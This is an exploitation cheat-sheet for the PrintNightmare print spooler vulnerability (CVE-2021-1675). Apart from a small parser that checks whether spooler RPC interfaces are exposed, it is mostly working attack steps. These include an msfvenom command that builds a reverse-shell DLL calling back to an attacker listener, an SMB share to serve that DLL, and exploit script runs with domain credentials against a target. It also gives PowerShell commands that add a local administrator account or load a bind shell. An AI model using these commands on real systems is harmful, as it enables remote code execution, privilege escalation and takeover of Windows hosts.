# CVE-2021-1675 - PrintNightmare

To check whether a target is potentially vulnerable, enumerate its RPC endpoints with Impacket's rpcdump.py and look for the print spooler interfaces MS-RPRN and MS-PAR:

```
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol
```
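The check above, as an added example that is not part of the original page or of Impacket: a small parser that reads rpcdump.py output and reports which spooler interfaces a host exposes and over which bindings, which is handy when inventorying machines that still have the spooler reachable. The rpcdump output embedded below is constructed to resemble the tool's format, not a real capture.

```python
import re
from typing import Dict, List

# Spooler RPC interfaces through which CVE-2021-1675 is reached.
SPOOLER_PROTOCOLS = {"MS-RPRN", "MS-PAR"}

# Constructed sample modelled on impacket rpcdump.py output (not a real capture).
SAMPLE_RPCDUMP = r"""
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49668]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49667]

Protocol: [MS-RPRN]: Print System Remote Protocol
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_np:\\DC01[\pipe\spoolss]
          ncacn_ip_tcp:192.168.1.10[49667]
"""

PROTO_RE = re.compile(r"^Protocol:\s*\[(?P<tag>[A-Z0-9-]+)\]")

def parse_rpcdump(text: str) -> Dict[str, List[str]]:
    """Map each protocol tag (e.g. MS-RPRN) to the bindings rpcdump listed under it."""
    endpoints: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        m = PROTO_RE.match(line)
        if m:
            current = m.group("tag")
            endpoints.setdefault(current, [])
        elif line[:1].isspace() and line.strip() and current:
            # rpcdump indents each binding under the "Bindings:" header
            endpoints[current].append(line.strip())
    return endpoints

def spooler_exposure(text: str) -> Dict[str, List[str]]:
    """Return only the spooler interfaces (MS-RPRN / MS-PAR) and where they are reachable."""
    return {p: b for p, b in parse_rpcdump(text).items() if p in SPOOLER_PROTOCOLS}

if __name__ == "__main__":
    for proto, bindings in spooler_exposure(SAMPLE_RPCDUMP).items():
        print(proto, "->", ", ".join(bindings))
```

Feed it the real output of `rpcdump.py @<host>` instead of the sample; an empty result means neither spooler interface is registered on that host.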

Remote exploitation:

Generate a DLL payload (LHOST=`x` is a placeholder for the listener address):

```
msfvenom -p windows/shell/reverse_tcp LHOST=`x` LPORT=443 -f dll > shell.dll
```

Serve the DLL over SMB with Impacket's smbserver (share name `morph3`, serving the current directory):

```
impacket-smbserver -debug morph3 . -smb2support
```

Exploit it with one of the following scripts. The first form loads the DLL from the SMB share, the second from a path on the target; adjust the share and DLL names to match what you actually served (for the server above that would be `\\192.168.1.215\morph3\shell.dll`):

* <https://github.com/cube0x0/CVE-2021-1675>
* <https://github.com/ly4k/PrintNightmare>

```
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
```

Local exploitation:

* <https://github.com/calebstewart/CVE-2021-1675>

```
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
```

or

```
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
```

